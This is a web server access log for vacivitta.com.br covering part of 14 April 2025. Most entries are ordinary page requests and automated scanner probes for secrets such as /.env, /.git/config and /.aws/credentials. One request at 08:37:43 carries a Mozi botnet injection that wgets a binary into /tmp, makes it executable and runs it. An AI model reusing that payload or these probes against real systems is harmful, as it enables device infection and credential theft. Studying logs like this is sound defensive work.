77.65.142.1 - - [14/Apr/2025:02:23:11 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:02:27:12 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.34 - - [14/Apr/2025:02:37:18 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
49.48.144.77 - - [14/Apr/2025:02:40:15 -0300] "GET / HTTP/1.0" 200 488 "-" "curl/7.88.1"
vacivitta.com.br:80
20.65.194.170 - - [14/Apr/2025:02:42:06 -0300] "GET /manager/text/list HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:02:42:42 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
184.105.139.70 - - [14/Apr/2025:02:44:14 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
45.156.128.43 - - [14/Apr/2025:02:46:08 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
vacivitta.com.br:80
45.156.128.43 - - [14/Apr/2025:02:46:32 -0300] "GET /ext-js/app/common/zld_product_spec.js HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
vacivitta.com.br:80
185.40.4.51 - - [14/Apr/2025:02:47:04 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
194.164.60.205 - - [14/Apr/2025:03:01:49 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
vacivitta.com.br:80
194.164.60.205 - - [14/Apr/2025:03:01:49 -0300] "POST / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:03:02:30 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [14/Apr/2025:03:03:39 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:03:26:53 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:03:46:42 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
5.183.209.244 - - [14/Apr/2025:04:03:04 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
147.185.132.46 - - [14/Apr/2025:04:03:06 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
147.185.132.46 - - [14/Apr/2025:04:03:06 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.34 - - [14/Apr/2025:04:10:30 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:04:16:57 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
139.180.48.101 - - [14/Apr/2025:04:19:58 -0300] "GET / HTTP/1.0" 200 488 "-" "curl/7.88.1"
vacivitta.com.br:80
139.180.48.101 - - [14/Apr/2025:04:20:03 -0300] "GET / HTTP/1.0" 200 488 "-" "curl/7.88.1"
vacivitta.com.br:80
139.180.48.101 - - [14/Apr/2025:04:20:04 -0300] "GET / HTTP/1.0" 200 488 "-" "curl/7.88.1"
vacivitta.com.br:80
154.81.156.35 - - [14/Apr/2025:04:23:48 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.242.226.154 - - [14/Apr/2025:04:32:59 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
vacivitta.com.br:80
185.242.226.154 - - [14/Apr/2025:04:33:57 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Python/3.7 aiohttp/3.8.1"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:04:36:28 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.242.226.154 - - [14/Apr/2025:04:45:42 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:04:53:27 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.218.86.4 - - [14/Apr/2025:04:54:13 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
80.82.77.202 - - [14/Apr/2025:05:10:10 -0300] "\x16\x03\x02\x01o\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:05:15:02 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
109.145.249.186 - - [14/Apr/2025:05:17:27 -0300] "GET / HTTP/1.0" 200 488 "-" "curl/7.88.1"
vacivitta.com.br:80
154.81.156.34 - - [14/Apr/2025:05:26:33 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
104.234.115.91 - - [14/Apr/2025:05:33:12 -0300] "GET / HTTP/1.0" 200 488 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
vacivitta.com.br:80
154.81.156.35 - - [14/Apr/2025:05:35:17 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:05:40:30 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
104.234.115.91 - - [14/Apr/2025:05:40:32 -0300] "GET /doc/index.html HTTP/1.1" 404 - "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
vacivitta.com.br:80
104.234.115.91 - - [14/Apr/2025:05:42:35 -0300] "GET //webpages/login.html HTTP/1.1" 404 - "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
vacivitta.com.br:80
58.91.87.49 - - [14/Apr/2025:05:46:04 -0300] "GET / HTTP/1.0" 200 488 "-" "curl/7.88.1"
vacivitta.com.br:80
87.251.78.46 - - [14/Apr/2025:05:53:32 -0300] "GET /phpinfo HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
vacivitta.com.br:80
87.251.78.46 - - [14/Apr/2025:05:53:32 -0300] "GET /phpinfo.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
vacivitta.com.br:80
87.251.78.46 - - [14/Apr/2025:05:53:33 -0300] "GET /test.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
vacivitta.com.br:80
87.251.78.46 - - [14/Apr/2025:05:53:33 -0300] "GET /_profiler/phpinfo HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
vacivitta.com.br:80
87.251.78.46 - - [14/Apr/2025:05:53:33 -0300] "GET /info.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
vacivitta.com.br:80
87.251.78.46 - - [14/Apr/2025:05:53:33 -0300] "GET /php.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
vacivitta.com.br:80
87.251.78.46 - - [14/Apr/2025:05:53:33 -0300] "GET /php_info.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
vacivitta.com.br:80
87.251.78.46 - - [14/Apr/2025:05:53:33 -0300] "GET /i.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
vacivitta.com.br:80
87.251.78.46 - - [14/Apr/2025:05:53:33 -0300] "GET /pi.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
vacivitta.com.br:80
87.251.78.46 - - [14/Apr/2025:05:53:34 -0300] "GET /config.phpinfo HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
vacivitta.com.br:80
87.251.78.46 - - [14/Apr/2025:05:53:34 -0300] "GET /admin/phpinfo.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
vacivitta.com.br:80
87.251.78.46 - - [14/Apr/2025:05:53:34 -0300] "GET /.aws/credentials HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
vacivitta.com.br:80
192.227.158.8 - - [14/Apr/2025:05:58:29 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:06:02:45 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
88.181.221.195 - - [14/Apr/2025:06:08:59 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:06:15:56 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
209.38.27.119 - - [14/Apr/2025:06:28:15 -0300] "GET /.git/config HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:06:29:02 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [14/Apr/2025:06:43:08 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:06:53:08 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
34.88.9.54 - - [14/Apr/2025:06:57:13 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
34.88.9.54 - - [14/Apr/2025:06:57:16 -0300] "OPTIONS / HTTP/1.0" 200 - "-" "-"
vacivitta.com.br:80
154.81.156.34 - - [14/Apr/2025:06:58:05 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
38.134.40.59 - - [14/Apr/2025:07:18:42 -0300] "GET /F58rYqB/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:07:24:05 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:07:39:41 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [14/Apr/2025:07:57:43 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:07:59:02 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:08:20:28 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.34 - - [14/Apr/2025:08:28:08 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
139.5.1.201 - - [14/Apr/2025:08:37:43 -0300] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 404 - "-" "-"
vacivitta.com.br:80
5.183.209.244 - - [14/Apr/2025:08:40:55 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:08:41:41 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
138.197.67.246 - - [14/Apr/2025:08:46:42 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
vacivitta.com.br:80
138.197.67.246 - - [14/Apr/2025:08:46:42 -0300] "GET /.git/config HTTP/1.1" 404 - "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
vacivitta.com.br:80
165.154.182.179 - - [14/Apr/2025:08:47:11 -0300] "\x16\x03\x01\x01\x17\x01" 404 - "-" "-"
vacivitta.com.br:80
165.154.182.179 - - [14/Apr/2025:08:47:21 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
vacivitta.com.br:80
165.154.182.179 - - [14/Apr/2025:08:47:26 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
vacivitta.com.br:80
165.154.182.179 - - [14/Apr/2025:08:47:26 -0300] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
vacivitta.com.br:80
165.154.182.179 - - [14/Apr/2025:08:47:26 -0300] "GET /sitemap.xml HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
vacivitta.com.br:80
165.154.182.179 - - [14/Apr/2025:08:47:26 -0300] "GET /assets/index-DogtGhmX.js HTTP/1.1" 200 839022 "-" "Go-http-client/1.1"
vacivitta.com.br:80
165.154.182.179 - - [14/Apr/2025:08:47:27 -0300] "GET /config.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
vacivitta.com.br:80
154.81.156.35 - - [14/Apr/2025:08:55:06 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:09:08:18 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
101.1.169.205 - - [14/Apr/2025:09:13:26 -0300] "GET / HTTP/1.0" 200 488 "-" "curl/7.88.1"
vacivitta.com.br:80
86.182.29.60 - - [14/Apr/2025:09:30:11 -0300] "GET / HTTP/1.0" 200 488 "-" "curl/7.88.1"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:09:30:51 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:09:38:01 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.34 - - [14/Apr/2025:09:43:09 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:09:57:01 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [14/Apr/2025:09:58:42 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
164.52.24.188 - - [14/Apr/2025:10:07:05 -0300] "\x16\x03\x01\x02" 404 - "-" "-"
vacivitta.com.br:80
164.52.24.188 - - [14/Apr/2025:10:07:22 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
vacivitta.com.br:80
164.52.24.188 - - [14/Apr/2025:10:07:25 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
164.52.24.188 - - [14/Apr/2025:10:07:29 -0300] "GET /v1/models HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
vacivitta.com.br:80
164.52.24.188 - - [14/Apr/2025:10:07:32 -0300] "GET /v1/models HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
vacivitta.com.br:80
164.52.24.188 - - [14/Apr/2025:10:07:35 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
vacivitta.com.br:80
164.52.24.188 - - [14/Apr/2025:10:07:38 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
vacivitta.com.br:80
164.52.24.188 - - [14/Apr/2025:10:07:42 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
vacivitta.com.br:80
23.248.167.99 - - [14/Apr/2025:10:22:04 -0300] "GET /.env HTTP/1.1" 404 - "-" "python-requests/2.31.0"
vacivitta.com.br:80
5.183.209.244 - - [14/Apr/2025:10:34:10 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:10:34:54 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:10:46:08 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
209.38.27.119 - - [14/Apr/2025:10:46:14 -0300] "GET /.git/config HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
vacivitta.com.br:80
185.218.86.4 - - [14/Apr/2025:10:58:01 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.34 - - [14/Apr/2025:11:05:09 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
80.82.77.202 - - [14/Apr/2025:11:09:37 -0300] "\x16\x03\x02\x01o\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:11:10:36 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [14/Apr/2025:11:22:25 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:11:24:08 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
209.38.27.119 - - [14/Apr/2025:11:41:30 -0300] "GET /.git/config HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:11:57:11 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
218.31.112.75 - - [14/Apr/2025:11:59:28 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:12:02:36 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [14/Apr/2025:12:26:27 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
